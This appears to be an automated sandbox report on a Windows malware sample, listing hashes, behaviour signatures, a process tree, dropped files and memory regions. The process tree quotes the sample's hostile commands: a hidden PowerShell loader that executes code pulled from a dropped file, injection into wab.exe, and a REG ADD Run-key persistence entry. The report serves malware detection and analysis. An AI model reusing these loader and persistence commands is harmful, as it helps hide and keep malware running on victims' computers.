Resubmissions

09-07-2024 08:24

240709-kayyraxdja 10

09-07-2024 08:05

240709-jy18catfpk 8

09-07-2024 08:03

240709-jxzywstfln 10

09-07-2024 07:56

240709-js4raawenc 10

09-07-2024 07:46

240709-jl1faatarm 10

09-07-2024 07:38

240709-jgh1fawajg 8

Analysis

  • max time kernel
    597s
  • max time network
    493s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    09-07-2024 08:05

General

  • Target

    batterie daahindenes.exe

  • Size

    398KB

  • MD5

    b1c35e78f5d588430c4f534479def9f2

  • SHA1

    f787dd3327ca04361935f74867f76f16821db99f

  • SHA256

    4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7

  • SHA512

    5f78e6794ae313f5ca96c33fe0ecf0c882a18a93caa54bf92823ac42c5c753b6a98d4c77618de2b62cbc9d24e6e500272e4ffa7b25afff20b7e8349fc278a66c

  • SSDEEP

    12288:9GkmNVhJhqnfP30YhNia+nv4tQD3W/P19QY:9GkmPh7qfPrsQeD3W/bd

Malware Config

Signatures

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 10 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\batterie daahindenes.exe
    "C:\Users\Admin\AppData\Local\Temp\batterie daahindenes.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:2008
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2544
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:2616
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
      PID:2708
    • C:\Windows\regedit.exe
      "C:\Windows\regedit.exe"
      1⤵
      • Runs regedit.exe
      • Suspicious behavior: GetForegroundWindowSpam
      PID:2936
    • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
      "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\system32\wermgr.exe
        "C:\Windows\system32\wermgr.exe" "-outproc" "1096" "880"
        2⤵
          PID:1580
      • C:\Windows\explorer.exe
        explorer.exe
        1⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:284
        • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3032
          • C:\Windows\system32\wermgr.exe
            "C:\Windows\system32\wermgr.exe" "-outproc" "3032" "880"
            3⤵
              PID:2600
        • C:\Windows\system32\AUDIODG.EXE
          C:\Windows\system32\AUDIODG.EXE 0x598
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2268
        • C:\Windows\explorer.exe
          explorer.exe
          1⤵
          • Boot or Logon Autostart Execution: Active Setup
          • Modifies registry class
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2848
          • C:\Windows\system32\taskmgr.exe
            "C:\Windows\system32\taskmgr.exe" /4
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:2580

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\OutofProcReport259902064.txt

          Filesize

          1KB

          MD5

          52adb0f7ab38f06d59f3358e8a351803

          SHA1

          5ec15aaa48cbd2a852cbf5c27831bef97e22b11f

          SHA256

          bb9e8f95f27c2a26414412144046980f618f5b6bbb76dfd6376990429b087bce

          SHA512

          0e50950cee99d8676e16021415b8bbf5dc9c29ec622e9b747c479dcad0854948475dd452c588297464d0a16841192e2b4227fc6bcc5c55e59cda716bb2275b49

        • C:\Users\Admin\AppData\Local\Temp\OutofProcReport259948958.txt

          Filesize

          1KB

          MD5

          7f2449903a1c386d4d33278b8c03da5e

          SHA1

          6e103c0d1d028398d18470019f2f3c601f38cd26

          SHA256

          565ee83bc2fd2271c034e558b6b64d646157b67920da2cb2cfa2f984a19700ae

          SHA512

          15e6cc8dc8e7743df55ae8d7dbaa72f48cd26aab4f479f3b3389fe50508a36b3213a4d77e878473fd30fb967e9265550b1fc95d00c2d548646750b6de8653314

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          6KB

          MD5

          490919770ce4bf4f08ea6e727cd9d569

          SHA1

          7a8b6fe38a3a4f43caa1acc7b12284b79422325f

          SHA256

          f2da85200b8d5197a93363a1f003b6436ae48fbdcd40bb4a00c49b9af23d4936

          SHA512

          abee1c24e472e1d77d37ce344889d3baf790645f15301fbd9518603357ab7fb43d64fc6381c9cbd3fe25da0e4c351fc3a5ecd4a71fe774e80681e0c8687daab0

        • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Boomless.Fag

          Filesize

          344KB

          MD5

          1a78d0f226d0db154812e61b8cadb4b8

          SHA1

          e76650e32ed8bc1e3d72dde1aa6566ff031e0c6e

          SHA256

          19997e372b58bcd5bacd8b199b1633307f0c89fc3ce7abfd4087ec739742f78e

          SHA512

          b06759e8bfeb73187c5277aaaa9c6489f51a88f42b461ec0775de6741f6b797dc3c2cbb8f6cf79815078a420a26cde9cedd861c4d16ac73a037e2160efc4ec41

        • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid

          Filesize

          68KB

          MD5

          d89dac6d6bcfb431c31bdf7d21f48fbd

          SHA1

          2f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9

          SHA256

          ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b

          SHA512

          76eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070

        • C:\Users\Admin\explorer.exe

          Filesize

          2.7MB

          MD5

          ac4c51eb24aa95b77f705ab159189e24

          SHA1

          4583daf9442880204730fb2c8a060430640494b1

          SHA256

          6a671b92a69755de6fd063fcbe4ba926d83b49f78c42dbaeed8cdb6bbc57576a

          SHA512

          011bfe19bd15dcc0f9850575e20d7f2c01160ec98ba461ad59a51b9417049e6475648b9056990247699624b080cf609ec7b5409231cfb46a012d723f7db08d81

        • memory/1096-46-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

          Filesize

          2.9MB

        • memory/1096-47-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

          Filesize

          32KB

        • memory/2432-22-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-21-0x00000000067F0000-0x000000000938E000-memory.dmp

          Filesize

          43.6MB

        • memory/2432-11-0x0000000073DE1000-0x0000000073DE2000-memory.dmp

          Filesize

          4KB

        • memory/2432-20-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-18-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-15-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-13-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-14-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-12-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2580-63-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2580-64-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/3032-56-0x000000001B550000-0x000000001B832000-memory.dmp

          Filesize

          2.9MB

        • memory/3032-57-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

          Filesize

          32KB